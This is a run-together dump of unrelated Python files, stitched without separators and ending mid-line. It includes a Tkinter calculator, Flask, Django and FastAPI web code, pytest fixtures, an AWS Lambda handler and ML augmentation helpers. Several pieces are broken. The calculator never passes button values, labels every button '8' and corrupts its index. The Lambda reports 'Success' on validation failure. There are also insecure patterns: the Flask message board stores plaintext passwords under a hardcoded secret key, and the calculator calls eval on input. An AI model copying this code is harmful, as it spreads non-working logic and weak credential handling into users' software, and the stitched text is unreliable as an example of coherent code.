print(len(S)) print(S.pop()) S.push(6) S.push(8) print(S.pop()) import os import pathlib def home_is_where_this_file_is(): """Changes the working directory to wherever this file is located.""" current_working_directory = pathlib.Path.cwd() file_home_directory = pathlib.PurePath(__file__).parent if current_working_directory == file_home_directory: return else: os.chdir (file_home_directory) from sqlalchemy_1_3.testing import eq_ from sqlalchemy_1_3.testing import expect_deprecated from sqlalchemy_1_3.testing import fixtures from sqlalchemy_1_3.util.deprecations import warn_deprecated_limited from sqlalchemy_1_3.util.langhelpers import _hash_limit_string class WarnDeprecatedLimitedTest(fixtures.TestBase): __backend__ = False def test_warn_deprecated_limited_text(self): with expect_deprecated("foo has been deprecated"): warn_deprecated_limited( "%s has been deprecated [%d]", ("foo", 1), "1.3" ) def test_warn_deprecated_limited_cap(self): """warn_deprecated_limited() and warn_limited() use _hash_limit_string actually just verifying that _hash_limit_string works as expected """ occurrences = 100 cap = 10 printouts = set() messages = set() for i in range(occurrences): message = _hash_limit_string( "this is a unique message: %d", cap, (i,) ) printouts.add(str(message)) messages.add(message) eq_(len(printouts), occurrences) eq_(len(messages), cap) GUI Applications/calc2short.py from tkinter import Tk from tkinter import Entry from tkinter import Button from tkinter import StringVar t=Tk() t.title("") t.geometry("425x300") t.resizable(0,0) t.configure(background="black")#back ground color a=StringVar() def show(c): a.set(a.get()+c) def equal(): x=a.get() a.set(eval(x)) def clear(): a.set("") e1=Entry(font=("",30),justify="right",textvariable=a) e1.place(x=0,y=0,width=425,height=50) b=[Button()]*16 data=["7","8","9","+","4","5","6","-","1","2","3","*","C","0","=","/"] k=0 x=5 y=55 for i in range(4): for j in range(4): b[k]=Button(text="8",font=("",25),bg="gray",fg="white",activebackground="yellow",command=show) b[k].place(x=x,y=y,width=100,height=50) k+=1 k+=105 x=5 y+=55 t.mainloop()pgThiago/Learning-Python1-10 # Crie um programa que leia o nome de uma pesoa e diga se ela possui "SILVA" no nome. nome = str(input("Digite seu nome completo: ")).upper().strip().split() print(f"Seu nome tem 'SILVA?' {'SILVA' in nome}") from numpy import product from rest_framework import serializers from product.serializers import ProductSerializer from order.models import Order from product.models import Product class OrderSerializer(serializers.ModelSerializer): products = ProductSerializer(read_only=True, many=True) products_ids = serializers.PrimaryKeyRelatedField( queryset=Product.objects.all(), write_only=True, many=True) total = serializers.SerializerMethodField() def get_total(self, instance): total = sum([product.price for product in instance.products.all()]) return total class Meta: model = Order fields = ["products", "total", 'products_ids', 'user'] extra_kwargs = {'product': {'required': False}} def create(self, validated_data): product_data = validated_data.pop('products_ids') order = Order.objects.create(**validated_data) for product in product_data: order.products.add(product) return order 100-1000 # This code is a bit ...messy and includes some workarounds # It functions fine, but needs some cleanup # Checked the DecimalEncoder and Checks workarounds 20200402 and no progression towards fix import boto3, json, os, decimal SM_ARN = 'YOUR_STATEMACHINE_ARN' sm = boto3.client('stepfunctions') def lambda_handler(event, context): # Print event data to logs .. print("Received event: " + json.dumps(event)) # Load data coming from APIGateway data = json.loads(event['body']) data['waitSeconds'] = int(data['waitSeconds']) # Sanity check that all of the parameters we need have come through from API gateway # Mixture of optional and mandatory ones checks = [] checks.append('waitSeconds' in data) checks.append(type(data['waitSeconds']) == int) checks.append('preference' in data) checks.append('message' in data) if data.get('preference') == 'sms': checks.append('phone' in data) if data.get('preference') == 'email': checks.append('email' in data) # if any checks fail, return error to API Gateway to return to client if False in checks: response = { "statusCode": 400, "headers": {"Access-Control-Allow-Origin":"*"}, "body": json.dumps( { "Status": "Success", "Reason": "Input failed validation" }, cls=DecimalEncoder ) } # If none, start the state machine execution and inform client of 2XX success :) else: sm.start_execution( stateMachineArn=SM_ARN, input=json.dumps(data, cls=DecimalEncoder) ) response = { "statusCode": 200, "headers": {"Access-Control-Allow-Origin":"*"}, "body": json.dumps( {"Status": "Success"}, cls=DecimalEncoder ) } return response # This is a workaround for: http://bugs.python.org/issue16535 # Solution discussed on this thread https://stackoverflow.com/questions/11942364/typeerror-integer-is-not-json-serializable-when-serializing-json-in-python # https://stackoverflow.com/questions/1960516/python-json-serialize-a-decimal-object # Credit goes to the group :) class DecimalEncoder(json.JSONEncoder): def default(self, obj): if isinstance(obj, decimal.Decimal): return int(obj) return super(DecimalEncoder, self).default(obj) lcgooder/Message-Board # coding=utf-8 import os from sqlite3 import dbapi2 as sqlite3 from flask import Flask, request, session, g, redirect, url_for, abort, \ render_template, flash, current_app from flask_moment import Moment from datetime import datetime import time app = Flask('demo') moment = Moment(app) app.config.update(dict( DATABASE=os.path.join(app.root_path, 'demo.db'), DEBUG=False, SECRET_KEY=b'_5#y2L"F4Q8z\n\xec]/', USERNAME='admin', PASSWORD='' )) def connect_db(): """Connects to the specific database.""" rv = sqlite3.connect(current_app.config['DATABASE']) rv.row_factory = sqlite3.Row return rv def get_db(): """Opens a new database connection if there is none yet for the current application context. """ if not hasattr(g, 'sqlite_db'): g.sqlite_db = connect_db() return g.sqlite_db def init_db(): """Initializes the database.""" with app.app_context(): db = get_db() with app.open_resource('./schema.sql', mode='r') as f: db.cursor().executescript(f.read()) db.commit() @app.teardown_appcontext def close_db(error): """Closes the database again at the end of the request.""" if hasattr(g, 'sqlite_db'): g.sqlite_db.close() @app.route('/') def show_entries(): db = get_db() cur = db.execute('select title, text, rec, user from entries order by id desc') entries = cur.fetchall() return render_template('show_entries.html', entries=entries, current_time=datetime.utcnow(), conv=datetime.strptime) @app.route('/add', methods=['POST']) def add_entry(): if not session.get('logged_in'): abort(401) db = get_db() db.execute('insert into entries (title, text, rec, user) values (?, ?, ?, ?)', [request.form['title'], request.form['text'], datetime.utcnow(), session['username']]) db.commit() flash('New message was successfully posted') return redirect(url_for('show_entries')) @app.route('/signup', methods=['GET', 'POST']) def signup(): error = None if request.method == 'POST': username = request.form['username'] inputpw = request.form['password'] confirm = request.form['confirm_password'] db = get_db() cur = db.execute('SELECT `username` FROM user WHERE username = ?',[username]) if cur.fetchone(): error = 'Duplicated Username!' elif inputpw != confirm: error = 'Unmatched Confirm!' else: db.execute('insert into user (username, password) values (?, ?)', [request.form['username'], request.form['password']]) db.commit() flash('Sign Up Secceed!') return redirect(url_for('login')) return render_template('signup.html', error=error, current_time=datetime.utcnow(), conv=datetime.strptime) @app.route('/login', methods=['GET', 'POST']) def login(): error = None if request.method == 'POST': username = request.form['username'] password = request.form['password'] db = get_db() cur = db.execute('SELECT `username`, `password` FROM user WHERE username = ?',[username]) data = cur.fetchone() if (not data) or password != data[1]: error = 'Invalid username or password' else: session['username'] = username session['logged_in'] = True flash('You were logged in') return redirect(url_for('show_entries')) return render_template('login.html', error=error, current_time=datetime.utcnow(), conv=datetime.strptime) @app.route('/logout') def logout(): session.pop('logged_in', None) session.pop('username', None) flash('You were logged out') return redirect(url_for('show_entries')) #init_db() #app.run(port=5001, debug=True) FHIRPower/SepsisPredictor/__init__.py default_app_config = 'SepsisPredictor.apps.SepsisPredictorConfig'tests/unit/conftest.py # Copyright 2021 Red Hat Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from unittest.mock import MagicMock, PropertyMock import pytest from mrack.config import ProvisioningConfig from mrack.host import STATUS_ACTIVE, Host """Fixtures for unit tests.""" @pytest.fixture def openstack_config(): return { "strategy": "retry", "max_retry": 5, "images": { "rhel-8.5": "osp-rhel-8-5", "fedora-34": "osp-fedora34", "win-2019": "osp-win-2019", }, "flavors": { "ipaserver": "test.medium", "ipaclient": "test.micro", "ad": "test.medium", "default": "test.nano", }, "networks": { "IPv4": [ "test-net4-1", "test-net4-2", "test-net4-3", "test-net4-4", ], "IPv6": [ "test-net6-1", ], "dual": [ "test-dual-1", "test-dual-2", ], }, "default_network": "IPv4", "keypair": "mrack-keypair", } @pytest.fixture def aws_config(): return { "images": { "rhel-8.5": "ami-rhel-8-5", "fedora-34": "ami-fedora34", "win-2019": "ami-win-2019", }, "flavors": { "ipaserver": "t2.medium", "ipaclient": "t2.micro", "ad": "t2.medium", "default": "t2.nano", }, "users": { "rhel-8.5": "ec2-user", }, "keypair": "mrack-keypair.pem", "security_group": "sg-something", "credentials_file": "aws.key", "profile": "default", "spot": True, "instance_tags": { "Name": "mrack-runner", "mrack": "True", "Persistent": "False", }, } @pytest.fixture def provisioning_config(openstack_config, aws_config): raw = { "openstack": openstack_config, "aws": aws_config, "users": { "rhel-8.5": "cloud-user", "fedora-34": "fedora", "win-2019": "Administrator", }, } return ProvisioningConfig(raw) @pytest.fixture def metahost1(): return { "name": "ipa1.example.com", "role": "first", "group": "ipaserver", "os": "rhel-8.5", } @pytest.fixture def metahost_win(): return { "name": "ipa1.example.com", "role": "ad", "group": "ad_root", "os": "win-2019", "network": "IPv4", } def mock_provider(name): mock = MagicMock() name_prop = PropertyMock(return_value=name) type(mock).name = name_prop return mock def meta_to_host(meta_host, provider_key, host_id, ip_address): return Host( mock_provider(provider_key), host_id, meta_host["name"], meta_host["os"], meta_host["group"], ip_address, STATUS_ACTIVE, {}, ) @pytest.fixture def host1_aws(metahost1): return meta_to_host(metahost1, "aws", "1", "192.168.0.128") @pytest.fixture def host1_osp(metahost1): return meta_to_host(metahost1, "openstack", "2", "192.168.1.128") @pytest.fixture def host_win_aws(metahost_win): return meta_to_host(metahost_win, "aws", "3", "192.168.0.129") app/webapp/webchat.py import requests, os import html import logging from flask import Flask, request, render_template, url_for, jsonify from pandas import to_datetime, to_timedelta from ..openai_agent.agent import OpenAIAgent from ..openai_agent.agent_utils import process_message_and_get_reply from dotenv import find_dotenv, load_dotenv from ast import literal_eval logging.basicConfig() logger = logging.getLogger("APP") logger.setLevel(logging.DEBUG) load_dotenv(find_dotenv()) app = Flask(__name__) chat_agent = OpenAIAgent(engine='davinci-codex',agent_name=os.environ.get("AGENT_NAME"),chatter_name=os.environ.get("CHATTER_NAME","HUMAN")) # @app.route("/") def index(): print(os.getcwd()) return render_template("docs.html") # @app.route('/bot', methods=['POST']) def bot(): incoming_msg = request.values.get('Body', '') resp = MessagingResponse() msg = resp.message() reply = process_message_and_get_reply(chat_agent,incoming_msg,120) msg.body(reply) return str(resp) # @app.route('/chat/') def chat(msg): if not chat_agent.is_conversation_active: chat_agent.start_conversation() logger.info("Previous conversation history: "+chat_agent.conversation) reply = process_message_and_get_reply(chat_agent,msg,120) conversation = chat_agent.conversation #chat_agent.make_chat_prompt(msg,False) conversation = conversation#+reply conversation_html = conversation.replace(chat_agent.START_TEMPLATE,""+chat_agent.START_TEMPLATE+"").replace("\n","
    ") logger.debug("New conversation history in html: "+conversation_html) return render_template("chat_template.html",conversation=conversation_html) # @app.route('/conversation') def show_conversation(): conversation = chat_agent.conversation conversation_html = conversation.replace(chat_agent.START_TEMPLATE,""+chat_agent.START_TEMPLATE+"").replace("\n","
    ") return render_template("chat_template.html",conversation=conversation_html) @app.route('/api/chat', methods=['POST']) def api_chat(): """ Function that receives a text message in the reponse of a POST request """ if not chat_agent.is_conversation_active: chat_agent.start_conversation() data = request.get_json() logger.debug(str(data)) if data is not None: if 'message' not in data: return jsonify({'error': 'missing required "message" field'}), 400 msg = data.pop('message') if 'engine' in data: agent = OpenAIAgent(engine=data.pop('engine'),agent_name=os.environ.get("AGENT_NAME"),chatter_name=os.environ.get("CHATTER_NAME","HUMAN")) else: agent = chat_agent.copy() if 'chatter_name' in data: chat_agent.set_chatter_name(data.pop('chatter_name')) if 'agent_name' in data: chat_agent.set_agent_name(data.pop('agent_name')) data['max_tokens'] = data.pop("length",data.get('max_tokens',120)) if data: agent.set_agent_params(**data) reply = process_message_and_get_reply(agent,msg) else: reply = 'I do not understand you!' return jsonify({'reply': reply}) json_resp = { 'agent_name':agent.agent_name, 'engine':agent.engine, 'message':msg, 'reply': reply, 'time': to_datetime("now").isoformat(), } return jsonify(json_resp) @app.route('/api/completion', methods=['POST']) def api_completion(): data = request.get_json() logger.debug(str(data)) if data: if 'message' not in data and 'prompt' not in data: return jsonify({'error': 'missing required "prompt" field'}), 400 if 'prompt' in data: prompt = data.pop('prompt') if 'message' in data: prompt = data.pop('message') if 'engine' in data: agent = OpenAIAgent(engine=data.pop('engine'),agent_name=os.environ.get("AGENT_NAME"),chatter_name=os.environ.get("CHATTER_NAME","HUMAN")) else: agent = chat_agent.copy() data['max_tokens'] = data.pop("length",data.get('max_tokens',120)) if data: agent.set_agent_params(**data) completion = agent.get_completion(prompt) else: return jsonify({'error': 'missing json payload'}), 400 json_resp = { 'engine':agent.engine, 'completion': prompt+completion.choices[0].text, 'time': to_datetime("now").isoformat(), } return jsonify(json_resp) if __name__ == '__main__': app.run(debug=False, host='0.0.0.0', port=int(os.environ.get('PORT', 8080)))BoostryJP/ibet-Wallet-API """ Copyright BOOSTRY Co., Ltd. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. SPDX-License-Identifier: Apache-2.0 """ from unittest import mock from web3 import Web3 from app import config from app.model.db import Node web3 = Web3(Web3.HTTPProvider(config.WEB3_HTTP_PROVIDER)) class TestNodeInfoBlockSyncStatus: # target api apiurl = "/v2/NodeInfo/BlockSyncStatus" @staticmethod def insert_node_data(session, is_synced, endpoint_uri=config.WEB3_HTTP_PROVIDER, priority=0): node = Node() node.is_synced = is_synced node.endpoint_uri = endpoint_uri node.priority = priority session.add(node) session.commit() ################################################## # Normal ################################################## # Normal_1 # Node is synced def test_normal_1(self, client, session): with mock.patch("app.utils.web3_utils.FailOverHTTPProvider.is_default", False): # prepare test data self.insert_node_data(session, is_synced=False, endpoint_uri="http://localhost:8546") self.insert_node_data(session, is_synced=True, endpoint_uri=config.WEB3_HTTP_PROVIDER, priority=1) # request target api resp = client.simulate_get(self.apiurl) # assertion latest_block_number = web3.eth.blockNumber assert resp.status_code == 200 assert resp.json["meta"] == { "code": 200, "message": "OK" } assert resp.json["data"] == { "is_synced": True, "latest_block_number": latest_block_number } # Normal_2 # Node is not synced def test_normal_2(self, client, session): with mock.patch("app.utils.web3_utils.FailOverHTTPProvider.is_default", False): # prepare test data self.insert_node_data(session, is_synced=False) self.insert_node_data(session, is_synced=False, endpoint_uri="http://localhost:8546", priority=1) # request target api resp = client.simulate_get(self.apiurl) # assertion assert resp.status_code == 200 assert resp.json["meta"] == { "code": 200, "message": "OK" } assert resp.json["data"] == { "is_synced": False, "latest_block_number": None } from datetime import datetime from typing import Callable, List, Optional from fastapi import APIRouter, Depends from pydantic import BaseModel from starlette.responses import Response from watchmen_auth import PrincipalService from watchmen_data_kernel.cache import CacheService from watchmen_data_kernel.common import ask_all_date_formats from watchmen_meta.admin import PipelineService from watchmen_meta.analysis import PipelineIndexService from watchmen_meta.common import ask_meta_storage, ask_snowflake_generator, TupleService from watchmen_model.admin import Pipeline, PipelineAction, PipelineStage, PipelineUnit, UserRole from watchmen_model.common import PipelineId, TenantId, TopicId from watchmen_rest import get_admin_principal, get_super_admin_principal from watchmen_rest.util import raise_400, raise_403, raise_404, validate_tenant_id from watchmen_rest_doll.doll import ask_tuple_delete_enabled from watchmen_rest_doll.util import trans, trans_readonly from watchmen_utilities import ArrayHelper, is_blank, is_date router = APIRouter() def get_pipeline_service(principal_service: PrincipalService) -> PipelineService: return PipelineService(ask_meta_storage(), ask_snowflake_generator(), principal_service) def get_pipeline_index_service(pipeline_service: PipelineService) -> PipelineIndexService: return PipelineIndexService(pipeline_service.storage, pipeline_service.snowflakeGenerator) @router.get('/pipeline', tags=[UserRole.ADMIN], response_model=Pipeline) async def load_pipeline_by_id( pipeline_id: Optional[PipelineId], principal_service: PrincipalService = Depends(get_admin_principal) ) -> Pipeline: if is_blank(pipeline_id): raise_400('Pipeline id is required.') pipeline_service = get_pipeline_service(principal_service) def action() -> Pipeline: # noinspection PyTypeChecker pipeline: Pipeline = pipeline_service.find_by_id(pipeline_id) if pipeline is None: raise_404() # tenant id must match current principal's if pipeline.tenantId != principal_service.get_tenant_id(): raise_404() return pipeline return trans_readonly(pipeline_service, action) def redress_action_ids(action: PipelineAction, pipeline_service: PipelineService) -> None: if TupleService.is_storable_id_faked(action.actionId): action.actionId = pipeline_service.generate_storable_id() def redress_unit_ids(unit: PipelineUnit, pipeline_service: PipelineService) -> None: if TupleService.is_storable_id_faked(unit.unitId): unit.unitId = pipeline_service.generate_storable_id() ArrayHelper(unit.do).each(lambda x: redress_action_ids(x, pipeline_service)) def redress_stage_ids(stage: PipelineStage, pipeline_service: PipelineService) -> None: if TupleService.is_storable_id_faked(stage.stageId): stage.stageId = pipeline_service.generate_storable_id() ArrayHelper(stage.units).each(lambda x: redress_unit_ids(x, pipeline_service)) def redress_ids(pipeline: Pipeline, pipeline_service: PipelineService) -> None: ArrayHelper(pipeline.stages).each(lambda x: redress_stage_ids(x, pipeline_service)) def build_pipeline_index(pipeline: Pipeline, pipeline_service: PipelineService) -> None: get_pipeline_index_service(pipeline_service).build_index(pipeline) def build_pipeline_cache(pipeline: Pipeline) -> None: CacheService.pipeline().put(pipeline) def post_save_pipeline(pipeline: Pipeline, pipeline_service: PipelineService) -> None: build_pipeline_index(pipeline, pipeline_service) build_pipeline_cache(pipeline) # noinspection PyUnusedLocal def ask_save_pipeline_action( pipeline_service: PipelineService, principal_service: PrincipalService) -> Callable[[Pipeline], Pipeline]: def action(pipeline: Pipeline) -> Pipeline: if pipeline_service.is_storable_id_faked(pipeline.pipelineId): pipeline_service.redress_storable_id(pipeline) redress_ids(pipeline, pipeline_service) # noinspection PyTypeChecker pipeline: Pipeline = pipeline_service.create(pipeline) else: # noinspection PyTypeChecker existing_pipeline: Optional[Pipeline] = pipeline_service.find_by_id(pipeline.pipelineId) if existing_pipeline is not None: if existing_pipeline.tenantId != pipeline.tenantId: raise_403() redress_ids(pipeline, pipeline_service) # noinspection PyTypeChecker pipeline: Pipeline = pipeline_service.update(pipeline) post_save_pipeline(pipeline, pipeline_service) return pipeline return action @router.post('/pipeline', tags=[UserRole.ADMIN], response_model=Pipeline) async def save_pipeline( pipeline: Pipeline, principal_service: PrincipalService = Depends(get_admin_principal) ) -> Pipeline: validate_tenant_id(pipeline, principal_service) pipeline_service = get_pipeline_service(principal_service) action = ask_save_pipeline_action(pipeline_service, principal_service) return trans(pipeline_service, lambda: action(pipeline)) def post_update_pipeline_name(pipeline: Pipeline, pipeline_service: PipelineService) -> None: get_pipeline_index_service(pipeline_service).update_index_on_name_changed(pipeline) CacheService.pipeline().put(pipeline) @router.get('/pipeline/rename', tags=[UserRole.ADMIN], response_class=Response) async def update_pipeline_name_by_id( pipeline_id: Optional[PipelineId], name: Optional[str], principal_service: PrincipalService = Depends(get_admin_principal) ) -> None: """ rename pipeline will not increase the optimistic lock version """ if is_blank(pipeline_id): raise_400('Pipeline id is required.') pipeline_service = get_pipeline_service(principal_service) def action() -> None: existing_tenant_id: Optional[TenantId] = pipeline_service.find_tenant_id(pipeline_id) if existing_tenant_id is None: raise_404() elif existing_tenant_id != principal_service.get_tenant_id(): raise_403() # noinspection PyTypeChecker pipeline: Pipeline = pipeline_service.update_name(pipeline_id, name, principal_service.get_tenant_id()) post_update_pipeline_name(pipeline, pipeline_service) trans(pipeline_service, action) def post_update_pipeline_enablement(pipeline: Pipeline, pipeline_service: PipelineService) -> None: get_pipeline_index_service(pipeline_service).update_index_on_enablement_changed(pipeline) CacheService.pipeline().put(pipeline) @router.get('/pipeline/enabled', tags=[UserRole.ADMIN], response_class=Response) async def update_pipeline_enabled_by_id( pipeline_id: Optional[PipelineId], enabled: Optional[bool], principal_service: PrincipalService = Depends(get_admin_principal) ) -> None: """ enable/disable pipeline will not increase the optimistic lock version """ if is_blank(pipeline_id): raise_400('Pipeline id is required.') if enabled is None: raise_400('Enabled is required.') pipeline_service = get_pipeline_service(principal_service) def action() -> None: existing_tenant_id: Optional[TenantId] = pipeline_service.find_tenant_id(pipeline_id) if existing_tenant_id is None: raise_404() elif existing_tenant_id != principal_service.get_tenant_id(): raise_403() # noinspection PyTypeChecker pipeline: Pipeline = pipeline_service.update_enablement(pipeline_id, enabled, principal_service.get_tenant_id()) post_update_pipeline_enablement(pipeline, pipeline_service) trans(pipeline_service, action) @router.get('/pipeline/all', tags=[UserRole.ADMIN], response_model=List[Pipeline]) async def find_all_pipelines(principal_service: PrincipalService = Depends(get_admin_principal)) -> List[Pipeline]: pipeline_service = get_pipeline_service(principal_service) def action() -> List[Pipeline]: tenant_id = principal_service.get_tenant_id() return pipeline_service.find_all(tenant_id) return trans_readonly(pipeline_service, action) class LastModified(BaseModel): at: str = None # noinspection DuplicatedCode @router.post('/pipeline/updated', tags=[UserRole.ADMIN], response_model=List[Pipeline]) async def find_updated_pipelines( lastModified: LastModified, principal_service: PrincipalService = Depends(get_admin_principal) ) -> List[Pipeline]: if lastModified is None or is_blank(lastModified.at): return [] parsed, last_modified_at = is_date(lastModified.at, ask_all_date_formats()) if not parsed: return [] if not isinstance(last_modified_at, datetime): last_modified_at = datetime( year=last_modified_at.year, month=last_modified_at.month, day=last_modified_at.day, hour=0, minute=0, second=0, microsecond=0, tzinfo=None) pipeline_service = get_pipeline_service(principal_service) def action() -> List[Pipeline]: return pipeline_service.find_modified_after(last_modified_at, principal_service.get_tenant_id()) return trans_readonly(pipeline_service, action) def remove_pipeline_index(pipeline_id: PipelineId, pipeline_service: PipelineService) -> None: get_pipeline_index_service(pipeline_service).remove_index(pipeline_id) def post_delete_pipeline(pipeline_id: PipelineId, pipeline_service: PipelineService) -> None: remove_pipeline_index(pipeline_id, pipeline_service) CacheService.pipeline().remove(pipeline_id) @router.delete('/pipeline', tags=[UserRole.SUPER_ADMIN], response_model=Pipeline) async def delete_pipeline_by_id_by_super_admin( pipeline_id: Optional[PipelineId] = None, principal_service: PrincipalService = Depends(get_super_admin_principal) ) -> Pipeline: if not ask_tuple_delete_enabled(): raise_404('Not Found') if is_blank(pipeline_id): raise_400('Topic id is required.') pipeline_service = get_pipeline_service(principal_service) def action() -> Pipeline: # noinspection PyTypeChecker pipeline: Pipeline = pipeline_service.delete(pipeline_id) if pipeline is None: raise_404() post_delete_pipeline(pipeline.pipelineId, pipeline_service) return pipeline return trans(pipeline_service, action) #!/usr/bin/env python3 import os import sys import shutil # Recursive rename file in folder (argument) to snake case directory = sys.argv[1] replace = [["(", "["], [")", "]"], ["{", "["], ["}", "]"], ["_", ""], ["---", "-"], ["--", "-"], ["+", ""]] def exclude_words(name): for item in replace: name = name.replace(item[0], item[1]) return name for root, dirs, files in os.walk(directory): for f in files: split = f.find(".") name = f.lower() name = exclude_words(name) name = name.replace(" ", "-") shutil.move(root+"/"+f, root+"/"+name) for root, dirs, files in os.walk(directory): for dr in dirs: name = dr.lower() name = exclude_words(name) shutil.move(root+"/"+dr, root+"/"+name) from torchvision import transforms import random def supervised_augmentations(): """ Return best augmentations for the Supervised algorithm. Returns: -------- train_transform: Torchvision transforms Augmentations for the training set. test_transform: Torchvision transforms Augmentations for the test set. """ train_transform = transforms.Compose([transforms.Resize(150), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), ]) test_transform = transforms.Compose([transforms.Resize(150), ]) return train_transform, test_transform def adda_augmentations(): """ Return best augmentations for the ADDA algorithm. Returns: -------- train_transform_source: Torchvision transforms Augmentations for the source training set. train_transform_target: Torchvision transforms Augmentations for the target training set. test_transform: Torchvision transforms Augmentations for the test set. """ train_transform_source = transforms.Compose([transforms.Resize(150), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), ]) train_transform_target = transforms.Compose([transforms.Resize(150), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), ]) test_transform = transforms.Compose([transforms.Resize(150), ]) return train_transform_source, train_transform_target, test_transform def adamatch_augmentations(): """ Return best augmentations for the AdaMatch algorithm. Returns: -------- train_transform_source_weak: Torchvision transforms Weak augmentations for the source training set. train_transform_source_strong: Torchvision transforms Strong augmentations for the source training set. train_transform_target_weak: Torchvision transforms Weak augmentations for the target training set. train_transform_target_strong: Torchvision transforms Strong augmentations for the target training set. test_transform: Torchvision transforms Augmentations for the test set. """ train_transform_source_weak = transforms.Compose([transforms.Resize(150), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), ]) train_transform_target_weak = transforms.Compose([transforms.Resize(150), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), ]) train_transform_source_strong = transforms.Compose([transforms.Resize(150), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.RandomAutocontrast(), transforms.GaussianBlur(kernel_size=(5, 9), sigma=(0.1, 1.)), #transforms.RandomEqualize(), # only on PIL images transforms.RandomInvert(), #transforms.RandomPosterize(random.randint(1, 8)), # only on PIL images transforms.RandomAdjustSharpness(random.uniform(0, 1)), transforms.RandomSolarize(random.uniform(0, 1)), transforms.RandomAffine(45, translate=(0.3, 0.3), scale=(0.8, 1.2), shear=(-0.3, 0.3, -0.3, 0.3)), #transforms.RandomErasing() ]) train_transform_target_strong = transforms.Compose([transforms.Resize(150), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.RandomAutocontrast(), transforms.GaussianBlur(kernel_size=(5, 9), sigma=(0.1, 1.)), #transforms.RandomEqualize(), # only on PIL images transforms.RandomInvert(), #transforms.RandomPosterize(random.randint(1, 8)), # only on PIL images transforms.RandomAdjustSharpness(random.uniform(0, 1)), transforms.RandomSolarize(random.uniform(0, 1)), transforms.RandomAffine(45, translate=(0.3, 0.3), scale=(0.8, 1.2), shear=(-0.3, 0.3, -0.3, 0.3)), #transforms.RandomErasing() ]) test_transform = transforms.Compose([transforms.Resize(150), ]) return train_transform_source_weak, train_transform_target_weak, train_transform_source_strong, train_transform_target_strong, test_transform def self_ensemble_augmentations(): """ Return best augmentations for the Self-Ensemble algorithm. Returns: -------- train_transform_source: Torchvision transforms Augmentations for the source training set. train_transform_target: Torchvision transforms Augmentations for the target training set. test_transform: Torchvision transforms Augmentations for the test set. """ train_transform_source = transforms.Compose([transforms.Resize(150), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), transforms.GaussianBlur(kernel_size=(5, 9), sigma=(0.1, 1.)), ]) train_transform_target = transforms.Compose([transforms.Resize(150), transforms.RandomHorizontalFlip(), transforms.RandomVerticalFlip(), ]) test_transform = transforms.Compose([transforms.Resize(150), ]) return train_transform_source, train_transform_target, test_transform# example 2 of pyusl # Fit the USL curve based on four measurements # Then plot the predicted curve from 1 to 20 from pyusl import usl; import numpy as np; u = usl(1, 2, 0) x = [1,2,3,4] y = [1,2.1,2.9,3.5] u.fit(x, y, requires_plot = False) xgrid = np.linspace(1,20,200) u.plot(xgrid) #!/usr/bin/env python3 import json import netaddr import sys import urllib.request import yaml GOOG_URL = "https://www.gstatic.com/ipranges/goog.json" CLOUD_URL = "https://www.gstatic.com/ipranges/cloud.json" def read_url(url): try: s = urllib.request.urlopen(url).read() return json.loads(s) except urllib.error.HTTPError: print("Invalid HTTP response from %s" % url) return {} except json.decoder.JSONDecodeError: print("Could not parse HTTP response from %s" % url) return {} def main(custom_labels): goog_json = read_url(GOOG_URL) cloud_json = read_url(CLOUD_URL) if goog_json and cloud_json: print("# Please use update-ip-range-labels.sh to update this file.") print("# {} published: {}".format(GOOG_URL, goog_json.get('creationTime'))) print("# {} published: {}".format(CLOUD_URL, cloud_json.get('creationTime'))) goog_ipv4_cidrs = netaddr.IPSet() goog_ipv6_cidrs = netaddr.IPSet() for e in goog_json['prefixes']: if e.get('ipv4Prefix'): goog_ipv4_cidrs.add(e.get('ipv4Prefix')) if e.get('ipv6Prefix'): goog_ipv6_cidrs.add(e.get('ipv6Prefix')) cloud_ipv4_cidrs = netaddr.IPSet() cloud_ipv6_cidrs = netaddr.IPSet() for e in cloud_json['prefixes']: if e.get('ipv4Prefix'): cloud_ipv4_cidrs.add(e.get('ipv4Prefix')) if e.get('ipv6Prefix'): cloud_ipv6_cidrs.add(e.get('ipv6Prefix')) print("ipv4_range_labels:") ipv4_cidr_labels = custom_labels.get('ipv4_range_labels', {}) if isinstance(ipv4_cidr_labels, dict): for ip, label in ipv4_cidr_labels.items(): i = netaddr.IPNetwork(ip) print(' - ["{}", "{}", "{}"]'.format(label, i[0], i[-1])) for i in goog_ipv4_cidrs.difference(cloud_ipv4_cidrs).iter_cidrs(): print(' - ["Google IPv4 CIDR", "{}", "{}"]'.format(i[0], i[-1])) print("ipv6_range_labels:") ipv6_cidr_labels = custom_labels.get('ipv6_range_labels', {}) if isinstance(ipv6_cidr_labels, dict): for ip, label in ipv6_cidr_labels.items(): i = netaddr.IPNetwork(ip) print(' - ["{}", "{}", "{}"]'.format(label, i[0], i[-1])) for i in goog_ipv6_cidrs.difference(cloud_ipv6_cidrs).iter_cidrs(): print(' - ["Google IPv4 CIDR", "{}", "{}"]'.format(i[0], i[-1])) if __name__ == '__main__': if 2 != len(sys.argv): print( 'Expecting a single parameter which is the custom labels yaml' ' file path.', file=sys.stderr) sys.exit(1) try: with open(sys.argv[1], 'r') as stream: custom_labels = yaml.safe_load(stream) except Exception: print('Unable to read the custom labels file {}.'.format(sys.argv[1]), file=sys.stderr) sys.exit(1) main(custom_labels) import model.regnet, model.loss, model.util, utils.structure import torch, os import SimpleITK as sitk import matplotlib.pyplot as plt; plot_dpi = 300 import numpy as np import logging, tqdm logging.basicConfig(level=logging.INFO, format = 